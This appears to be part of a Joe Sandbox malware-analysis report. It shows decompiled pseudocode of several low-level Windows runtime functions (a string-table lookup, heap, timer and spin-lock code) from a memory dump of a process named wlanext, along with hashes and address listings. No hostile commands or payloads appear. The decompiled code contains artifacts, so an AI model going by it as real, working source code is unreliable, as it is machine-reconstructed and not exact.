                                  0x03540ea3
                                  0x03540ea3
                                  0x03540ea7
                                  0x03540eaf
                                  0x03540eb3
                                  0x03540eb9
                                  0x03540eb9
                                  0x03540ebc
                                  0x03540ecd
                                  0x03540ecd
                                  0x00000000
                                  0x03540eb3
                                  0x03540e1e
                                  0x03540e21
                                  0x03540e25
                                  0x03540e2b
                                  0x03540e2f
                                  0x03540e30
                                  0x03540e3a
                                  0x03540e3f
                                  0x03540e41
                                  0x00000000
                                  0x00000000
                                  0x03540e47
                                  0x00000000
                                  0x03540e47
                                  0x03540df9
                                  0x03540dfe
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x03540dfe
                                  0x034e5303
                                  0x034e5307
                                  0x00000000
                                  0x034e5309
                                  0x00000000
                                  0x034e5309
                                  0x034e5307
                                  0x034e52e9
                                  0x034e52e9
                                  0x00000000
                                  0x034e52e9
                                  0x034e530e
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c3545435e339dc5f7f48a274335dc0e531c7bc0f97a887ec49703df7f7ad5fbf
                                  • Instruction ID: f797e18a4d64dc3976939ad36daef24bd77bcad4ec8177c3a67a8fef46809b48
                                  • Opcode Fuzzy Hash: c3545435e339dc5f7f48a274335dc0e531c7bc0f97a887ec49703df7f7ad5fbf
                                  • Instruction Fuzzy Hash: 9751EF35205742AFC321DF28D840B2BBBF4FF84714F18095EE5958B6A1E770E855CB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03512AE4 Relevance: .2, Instructions: 159COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E03512AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x35d8204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x35d8208; // 0x35d8207
				_t8 = _t57 + 0x35d8208; // 0x35d8207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x35d8450; // 0x0
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x35d821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x35d6d5c; // 0x7ffd0654
							_t72 =  *0x35d6d5c; // 0x7ffd0654
							_t75 =  *0x35d6d5c; // 0x7ffd0654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x35d6d5c; // 0x7ffd0654
							_t84 =  *0x35d6d5c; // 0x7ffd0654
							_t87 =  *0x35d6d5c; // 0x7ffd0654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E0352F3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}






































                                  0x03512ae4
                                  0x03512aec
                                  0x03512aef
                                  0x03512af4
                                  0x03512af7
                                  0x03512afd
                                  0x03512b92
                                  0x03512b92
                                  0x03512b97
                                  0x03512b9c
                                  0x03512b9c
                                  0x03512b03
                                  0x03512b06
                                  0x03512b09
                                  0x03512b09
                                  0x03512b0f
                                  0x03512b15
                                  0x03512b15
                                  0x03512b1b
                                  0x03512b1e
                                  0x03512b21
                                  0x03512b26
                                  0x03512b29
                                  0x03512b81
                                  0x03512b84
                                  0x03512c0e
                                  0x03512c15
                                  0x03512c24
                                  0x03512c24
                                  0x03512b8a
                                  0x03512b8a
                                  0x03512b8a
                                  0x03512b8a
                                  0x03512b90
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x03512b4a
                                  0x03512b4a
                                  0x03512b4d
                                  0x03512b53
                                  0x00000000
                                  0x00000000
                                  0x03512b55
                                  0x03512b58
                                  0x03512bb7
                                  0x03555d1b
                                  0x03555d37
                                  0x03555d47
                                  0x03555d53
                                  0x03512bbd
                                  0x03512bbd
                                  0x03512bbd
                                  0x03512bb7
                                  0x03512b5d
                                  0x03512c2f
                                  0x03555d5b
                                  0x03555d77
                                  0x03555d87
                                  0x03555d93
                                  0x03512c35
                                  0x03512c35
                                  0x03512c35
                                  0x03512c2f
                                  0x03512b65
                                  0x03512b9f
                                  0x03512ba2
                                  0x03512b67
                                  0x03512b67
                                  0x03512b69
                                  0x03512b6b
                                  0x03512b6e
                                  0x03512bc9
                                  0x03512bcc
                                  0x03512bcf
                                  0x03512bd4
                                  0x03512bd6
                                  0x03512bd6
                                  0x03512bdb
                                  0x03512c02
                                  0x03512c05
                                  0x03512c07
                                  0x00000000
                                  0x03512c07
                                  0x03512be0
                                  0x03512c00
                                  0x03512c3f
                                  0x03512c3f
                                  0x00000000
                                  0x03512c00
                                  0x03512be5
                                  0x03512be7
                                  0x03512bec
                                  0x03512bf4
                                  0x03512bf6
                                  0x00000000
                                  0x03512bf6
                                  0x03512b70
                                  0x03512b76
                                  0x03512b2b
                                  0x03512b2b
                                  0x03512b2d
                                  0x03512b2f
                                  0x03512b32
                                  0x03512b35
                                  0x03512b3a
                                  0x00000000
                                  0x03512b40
                                  0x03512b43
                                  0x03512b45
                                  0x03512b47
                                  0x03512b4a
                                  0x03512b4d
                                  0x03512b53
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x03512b53
                                  0x03512b78
                                  0x03512b78
                                  0x03512b7b
                                  0x03512b7e
                                  0x00000000
                                  0x03512b7e
                                  0x03512b76
                                  0x03512ba5
                                  0x03512ba5
                                  0x03512ba8
                                  0x03512bad
                                  0x00000000
                                  0x00000000
                                  0x03512baf
                                  0x03512baf
                                  0x03512bc2
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 496af70dc1d7eb0dbff7879929bd81b78cf4f11919572767925805141293071e
                                  • Instruction ID: a0f6b165270d03e857b754d5ef3d2ef1c5dd8381a664880a99c01383457716fe
                                  • Opcode Fuzzy Hash: 496af70dc1d7eb0dbff7879929bd81b78cf4f11919572767925805141293071e
                                  • Instruction Fuzzy Hash: A451D576E00115CFDB14DF1DE4909BEB7B5FB88700B168D5AE846AB374D730AA61CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 035AAE44 Relevance: .2, Instructions: 152COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 86%
                                  			E035AAE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				void* __esi;
				void* __ebp;
				signed short* _t36;
				signed int _t41;
				char* _t42;
				intOrPtr _t43;
				signed int _t47;
				void* _t52;
				signed int _t57;
				intOrPtr _t61;
				signed char _t62;
				signed int _t72;
				signed char _t85;
				signed int _t88;

				_t73 = __edx;
				_push(__ecx);
				_t85 = __ecx;
				_v8 = __edx;
				_t61 =  *((intOrPtr*)(__ecx + 0x28));
				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
					_t57 = _t57 | 0x00000001;
				}
				_t88 = 0;
				_t36 = 0;
				_t96 = _a12;
				if(_a12 == 0) {
					_t62 = _a8;
					__eflags = _t62;
					if(__eflags == 0) {
						goto L12;
					}
					_t52 = E035AC38B(_t85, _t73, _t57, 0);
					_t62 = _a8;
					 *_t62 = _t52;
					_t36 = 0;
					goto L11;
				} else {
					_t36 = E035AACFD(_t85, _t73, _t96, _t57, _a8);
					if(0 == 0 || 0 == 0xffffffff) {
						_t72 = _t88;
					} else {
						_t72 =  *0x00000000 & 0x0000ffff;
					}
					 *_a12 = _t72;
					_t62 = _a8;
					L11:
					_t73 = _v8;
					L12:
					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
						L19:
						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
							L22:
							_t74 = _v8;
							__eflags = _v8;
							if(__eflags != 0) {
								L25:
								__eflags = _t88 - 2;
								if(_t88 != 2) {
									__eflags = _t85 + 0x44 + (_t88 << 6);
									_t88 = E035AFDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
									goto L34;
								}
								L26:
								_t59 = _v8;
								E035AEA55(_t85, _v8, _t57);
								asm("sbb esi, esi");
								_t88 =  ~_t88;
								_t41 = E03507D50();
								__eflags = _t41;
								if(_t41 == 0) {
									_t42 = 0x7ffe0380;
								} else {
									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								__eflags =  *_t42;
								if( *_t42 != 0) {
									_t43 =  *[fs:0x30];
									__eflags =  *(_t43 + 0x240) & 0x00000001;
									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
										__eflags = _t88;
										if(_t88 != 0) {
											E035A1608(_t85, _t59, 3);
										}
									}
								}
								goto L34;
							}
							_push(_t62);
							_t47 = E035B1536(0x35d8ae4, (_t74 -  *0x35d8b04 >> 0x14) + (_t74 -  *0x35d8b04 >> 0x14), _t88, __eflags);
							__eflags = _t47;
							if(_t47 == 0) {
								goto L26;
							}
							_t74 = _v12;
							_t27 = _t47 - 1; // -1
							_t88 = _t27;
							goto L25;
						}
						_t62 = _t85;
						if(L035AC323(_t62, _v8, _t57) != 0xffffffff) {
							goto L22;
						}
						_push(_t62);
						_push(_t88);
						E035AA80D(_t85, 9, _v8, _t88);
						goto L34;
					} else {
						_t101 = _t36;
						if(_t36 != 0) {
							L16:
							if(_t36 == 0xffffffff) {
								goto L19;
							}
							_t62 =  *((intOrPtr*)(_t36 + 2));
							if((_t62 & 0x0000000f) == 0) {
								goto L19;
							}
							_t62 = _t62 & 0xf;
							if(E0358CB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
								L34:
								return _t88;
							}
							goto L19;
						}
						_t62 = _t85;
						_t36 = E035AACFD(_t62, _t73, _t101, _t57, _t62);
						if(_t36 == 0) {
							goto L19;
						}
						goto L16;
					}
				}
			}



















                                  0x035aae44
                                  0x035aae4c
                                  0x035aae53
                                  0x035aae55
                                  0x035aae5c
                                  0x035aae64
                                  0x035aae68
                                  0x035aae75
                                  0x035aae75
                                  0x035aae78
                                  0x035aae7a
                                  0x035aae7c
                                  0x035aae7f
                                  0x035aaea8
                                  0x035aaeab
                                  0x035aaead
                                  0x00000000
                                  0x00000000
                                  0x035aaeb3
                                  0x035aaeb8
                                  0x035aaebb
                                  0x035aaebd
                                  0x00000000
                                  0x035aae81
                                  0x035aae88
                                  0x035aae8f
                                  0x035aae9b
                                  0x035aae96
                                  0x035aae96
                                  0x035aae96
                                  0x035aaea0
                                  0x035aaea3
                                  0x035aaebf
                                  0x035aaebf
                                  0x035aaec3
                                  0x035aaec9
                                  0x035aaf0d
                                  0x035aaf14
                                  0x035aaf3d
                                  0x035aaf3d
                                  0x035aaf41
                                  0x035aaf44
                                  0x035aaf67
                                  0x035aaf67
                                  0x035aaf6a
                                  0x035aafca
                                  0x035aafd1
                                  0x00000000
                                  0x035aafd1
                                  0x035aaf6c
                                  0x035aaf6d
                                  0x035aaf75
                                  0x035aaf7c
                                  0x035aaf7e
                                  0x035aaf80
                                  0x035aaf85
                                  0x035aaf87
                                  0x035aaf99
                                  0x035aaf89
                                  0x035aaf92
                                  0x035aaf92
                                  0x035aaf9e
                                  0x035aafa1
                                  0x035aafa3
                                  0x035aafa9
                                  0x035aafb0
                                  0x035aafb2
                                  0x035aafb4
                                  0x035aafbc
                                  0x035aafbc
                                  0x035aafb4
                                  0x035aafb0
                                  0x00000000
                                  0x035aafa1
                                  0x035aaf4f
                                  0x035aaf57
                                  0x035aaf5c
                                  0x035aaf5e
                                  0x00000000
                                  0x00000000
                                  0x035aaf60
                                  0x035aaf64
                                  0x035aaf64
                                  0x00000000
                                  0x035aaf64
                                  0x035aaf1a
                                  0x035aaf25
                                  0x00000000
                                  0x00000000
                                  0x035aaf27
                                  0x035aaf28
                                  0x035aaf33
                                  0x00000000
                                  0x035aaed0
                                  0x035aaed0
                                  0x035aaed2
                                  0x035aaee1
                                  0x035aaee4
                                  0x00000000
                                  0x00000000
                                  0x035aaee6
                                  0x035aaeec
                                  0x00000000
                                  0x00000000
                                  0x035aaefb
                                  0x035aaf07
                                  0x035aafd3
                                  0x035aafdb
                                  0x035aafdb
                                  0x00000000
                                  0x035aaf07
                                  0x035aaed6
                                  0x035aaed8
                                  0x035aaedf
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x035aaedf
                                  0x035aaec9

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8ac1d8f49bc5386713abc2caf029fb47ba4f4978bff2ca7cc8601e45f4665706
                                  • Instruction ID: 106409bbc7f03b851f85bfbabe2d70215e0936fcc361f9f8fa2e05d16b4005f6
                                  • Opcode Fuzzy Hash: 8ac1d8f49bc5386713abc2caf029fb47ba4f4978bff2ca7cc8601e45f4665706
                                  • Instruction Fuzzy Hash: 8441C475700B515BD72ADA2DE894B3FF7A9BF84620F084619FC16CB2B0D734D801E6A1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0350DBE9 Relevance: .1, Instructions: 149COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 86%
                                  			E0350DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E034ECC50(E034E4510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E03507D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E035B8ED6(_t102, _t98);
						}
						_t76 = _v44;
						E03502280(_t58, _v44);
						E0350DD82(_v44, _t102, _t98);
						E0350B944(_t102, _v5);
						return E034FFFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x35d8628; // 0x0
							_v28 = _t67;
							_t68 =  *0x35d862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x35d8628; // 0x0
						_t105 = _v28;
						_t80 =  *0x35d862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x35afb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}









































                                  0x0350dbe9
                                  0x0350dbf2
                                  0x0350dbf7
                                  0x0350dbf9
                                  0x0350dbfc
                                  0x0350dc00
                                  0x0350dc03
                                  0x0350dc14
                                  0x0350dd54
                                  0x0350dd54
                                  0x0350dd54
                                  0x0350dc18
                                  0x0350dc1d
                                  0x0350dc1d
                                  0x0350dc32
                                  0x0350dc3b
                                  0x0350dc3e
                                  0x0350dc46
                                  0x0350dd5b
                                  0x0350dd62
                                  0x0350dd64
                                  0x0350dd67
                                  0x0350dd69
                                  0x0350dd6b
                                  0x0350dd6e
                                  0x0350dd70
                                  0x0350dd73
                                  0x0350dd73
                                  0x00000000
                                  0x0350dc4c
                                  0x0350dc4e
                                  0x03553ae3
                                  0x03553ae8
                                  0x03553aea
                                  0x0350dce7
                                  0x0350dce9
                                  0x0350dcec
                                  0x0350dcee
                                  0x0350dcf0
                                  0x0350dcf3
                                  0x0350dcf5
                                  0x03553af2
                                  0x03553af5
                                  0x03553af5
                                  0x0350dd06
                                  0x0350dd08
                                  0x0350dd0b
                                  0x0350dd12
                                  0x03553b08
                                  0x0350dd18
                                  0x0350dd18
                                  0x0350dd18
                                  0x0350dd20
                                  0x0350dd23
                                  0x03553b16
                                  0x03553b16
                                  0x0350dd29
                                  0x0350dd2d
                                  0x0350dd36
                                  0x0350dd40
                                  0x0350dd51
                                  0x0350dd51
                                  0x0350dc54
                                  0x0350dc59
                                  0x0350dc59
                                  0x0350dc5e
                                  0x0350dc5e
                                  0x0350dc63
                                  0x0350dc66
                                  0x0350dc6b
                                  0x0350dc78
                                  0x0350dc7b
                                  0x0350dc81
                                  0x0350dc81
                                  0x0350dc83
                                  0x0350dc89
                                  0x00000000
                                  0x00000000
                                  0x0350dd7b
                                  0x0350dd7b
                                  0x0350dc8f
                                  0x0350dc8f
                                  0x0350dc92
                                  0x0350dc99
                                  0x0350dc9f
                                  0x0350dca5
                                  0x0350dcaa
                                  0x0350dcaa
                                  0x0350dcb3
                                  0x0350dcb8
                                  0x0350dcbb
                                  0x0350dcc1
                                  0x0350dccf
                                  0x0350dcd2
                                  0x0350dcd5
                                  0x0350dcd7
                                  0x0350dcda
                                  0x0350dcdc
                                  0x0350dcdc
                                  0x0350dce2
                                  0x0350dce4
                                  0x00000000
                                  0x0350dce4

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: be77c19be3b897c956910744b93ae7bed511c26369f1f1c0ed0bfe2371e325ca
                                  • Instruction ID: 68992412698b22ffb99f6792cda62aa3740869121a96e5b1d14a01ae8ca66e90
                                  • Opcode Fuzzy Hash: be77c19be3b897c956910744b93ae7bed511c26369f1f1c0ed0bfe2371e325ca
                                  • Instruction Fuzzy Hash: 50511375A00206CFCB14CFA8D480B9EFBF5BF48350F25855AD964AB3A4DB32A944CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 034FEF40 Relevance: .1, Instructions: 147COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 96%
                                  			E034FEF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E034E9080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x770bc21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E034E2D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}




























                                  0x034fef4b
                                  0x034fef4d
                                  0x034fef57
                                  0x034ff0bd
                                  0x034ff0c2
                                  0x034ff0d2
                                  0x034ff0d2
                                  0x034ff0c2
                                  0x034fef5d
                                  0x034fef5f
                                  0x034fef67
                                  0x034fef6a
                                  0x034fef6d
                                  0x034fef74
                                  0x034fef7f
                                  0x034fef82
                                  0x034fef82
                                  0x034fef86
                                  0x034fef88
                                  0x034fef8c
                                  0x034fef8f
                                  0x034fef8f
                                  0x034fef8f
